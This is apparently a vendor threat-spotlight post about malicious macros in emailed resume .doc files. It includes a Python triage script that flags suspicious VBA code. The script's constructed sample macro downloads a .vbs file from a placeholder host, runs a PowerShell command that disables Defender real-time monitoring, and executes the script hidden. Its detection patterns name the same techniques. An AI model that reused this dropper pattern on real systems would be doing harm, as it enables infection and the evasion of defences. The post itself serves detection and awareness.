
Threat Spotlight: Emailed Resumes and Advanced Persistent Threats

An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and remains on the network undetected, stealing data for a long period of time.
Source: TechTarget

With the New Year upon us, many hopeful employees are polishing up their resumes in the hope of taking advantage of new opportunities. That has created an opportunity for criminals as well. In this Threat Spotlight, we focus on an attack in which resumes are used as bait for unsuspecting targets.
Highlighted Threat:
Advanced Persistent Threats in Unsuspected Places – Resumes
The Details:
In a two-week period in late 2016, one of our customers received five emailed resumes that carried an Advanced Persistent Threat (APT). For perspective, five sounds like a low number until you realize that it only takes one APT to compromise your credibility, take down your entire network, or even lead to the theft of enormous sums of money.
The resumes were all .doc files that contained a malicious macro. When the file was opened and the macro ran, it carried out a chain of highly malicious actions. The macro immediately:
- Downloaded and executed a Visual Basic script (VBScript)
- Retrieved additional functions from the web and ran them
- Spawned a command shell
- Connected to a remote server
- Began working to evade the computer's built-in anti-virus
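
The list above is also a useful checklist for triaging a suspect macro. The following is an added example, not Barracuda's code or the actual resume macro: it assumes the VBA source has already been extracted from the .doc (for instance with oletools' olevba, which is not invoked here) and scores the text against one indicator group per listed behaviour, plus the auto-run hook that fires the macro on open. Both macro samples in the block are constructed for illustration; the URL uses the reserved .invalid domain.

```python
"""Triage extracted VBA macro source against the behaviours listed above.

Added example (not Barracuda's code). Assumes the macro text has already been
pulled out of the .doc, e.g. with oletools' olevba; OLE parsing and VBA
decompression are out of scope here. SAMPLE_MALICIOUS and SAMPLE_BENIGN are
constructed for illustration and are not the actual resume macros.
"""
import re

# One indicator group per behaviour named in the post, plus the auto-run hook
# that makes a macro execute as soon as the document is opened.
INDICATORS = {
    "auto-execution on open": [
        r"\bAuto_?Open\b", r"\bDocument_Open\b", r"\bAutoExec\b",
    ],
    "downloads and runs a script": [
        r"\bURLDownloadToFile\w*\b", r"MSXML2\.(?:Server)?XMLHTTP",
        r"WinHttp\.WinHttpRequest", r"ADODB\.Stream", r"\.vbs\b",
        r"\b[wc]script\.exe\b",
    ],
    "imports external functions": [
        r"\bDeclare\b.*\bLib\b",          # Win32 API import via Declare ... Lib
    ],
    "spawns a shell": [
        r"\bShell\b", r"\bcmd(?:\.exe)?\b", r"\bpowershell(?:\.exe)?\b",
    ],
    "connects to a remote server": [
        r"https?://[^\s\"']+", r"\.Open\s+\"(?:GET|POST)\"",
    ],
    "tampers with or evades anti-virus": [
        r"DisableRealtimeMonitoring", r"Set-MpPreference", r"AmsiScanBuffer",
        r"\bStrReverse\b", r"Application\.Wait", r"\bSleep\b",
    ],
}

# VBA identifiers are case-insensitive, so compile every pattern that way.
COMPILED = {
    name: [re.compile(p, re.IGNORECASE) for p in patterns]
    for name, patterns in INDICATORS.items()
}


def scan(vba_source: str) -> dict:
    """Return {behaviour: [matched snippets]} for every behaviour with a hit.

    Matching is done line by line so each snippet can be shown in context;
    duplicate snippets within a behaviour are collapsed.
    """
    hits = {}
    for line in vba_source.splitlines():
        for name, patterns in COMPILED.items():
            for pat in patterns:
                m = pat.search(line)
                if m:
                    hits.setdefault(name, [])
                    if m.group(0) not in hits[name]:
                        hits[name].append(m.group(0))
    return hits


def is_suspicious(vba_source: str) -> bool:
    """Heuristic verdict: an auto-run hook plus at least two runtime behaviours.

    A single indicator (one Shell call, one URL) is common in legitimate
    business macros; the combination described in the post is not.
    """
    hits = scan(vba_source)
    runtime = [k for k in hits if k != "auto-execution on open"]
    return "auto-execution on open" in hits and len(runtime) >= 2


# Constructed sample: fires on open, imports a Win32 download API, fetches a
# second-stage .vbs, disables real-time scanning, then runs the script.
SAMPLE_MALICIOUS = r'''
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub AutoOpen()
    Dim dst As String
    dst = Environ("TEMP") & "\upd.vbs"
    ' download a second-stage script and hand it to the script host
    URLDownloadToFile 0, "http://example.invalid/upd.vbs", dst, 0, 0
    Shell "powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring $true", vbHide
    Shell "wscript.exe //B " & dst, vbHide
End Sub
'''

# Constructed sample: a harmless formatting macro that should not be flagged.
SAMPLE_BENIGN = r'''
Sub FormatHeader()
    With ActiveDocument.Tables(1).Rows(1).Range
        .Font.Bold = True
        .Shading.BackgroundPatternColor = wdColorGray15
    End With
End Sub
'''

if __name__ == "__main__":
    for label, src in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(f"{label}: suspicious={is_suspicious(src)}")
        for behaviour, snippets in scan(src).items():
            print(f"  {behaviour}: {snippets}")
```

The verdict deliberately requires the auto-run hook plus two or more of the runtime behaviours, because any one indicator on its own appears in plenty of legitimate macros; the value of the list in the post is the combination, not any single item.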

Once inside, these attackers typically operate in one of two ways:
(1) After compromising one employee's account (e.g., with a resume attack), they send a new threat to a different account from the compromised employee's own email address.
(2) They compromise an account and then watch to learn who in the company oversees wire transfers, invoices, and so forth. They use that information to launch a targeted spear phishing attack.
The emails were written in a casual, friendly tone and were designed to look like one colleague asking another for their opinion on a resume. Seems innocent enough, yes?
In every case, the employee opened the attachment because they mistook it for a legitimate resume that had been sent to them.
This threat underscores the importance of always following best practices when dealing with email. For example:
- Do not click links in email; type the address directly into your browser instead.
- Do not open suspicious attachments, even if they appear to come from someone you trust.
- Keep endpoint anti-virus, operating system patches, and other software up to date.
- Do not reveal sensitive personal or company information in email.
- If you aren't sure whether an email is legitimate, verify it by phoning the company or person directly, or through legitimate communications you have previously received from them.
Once end users have been trained in these practices, ongoing awareness training reinforces them and helps turn them into habits.
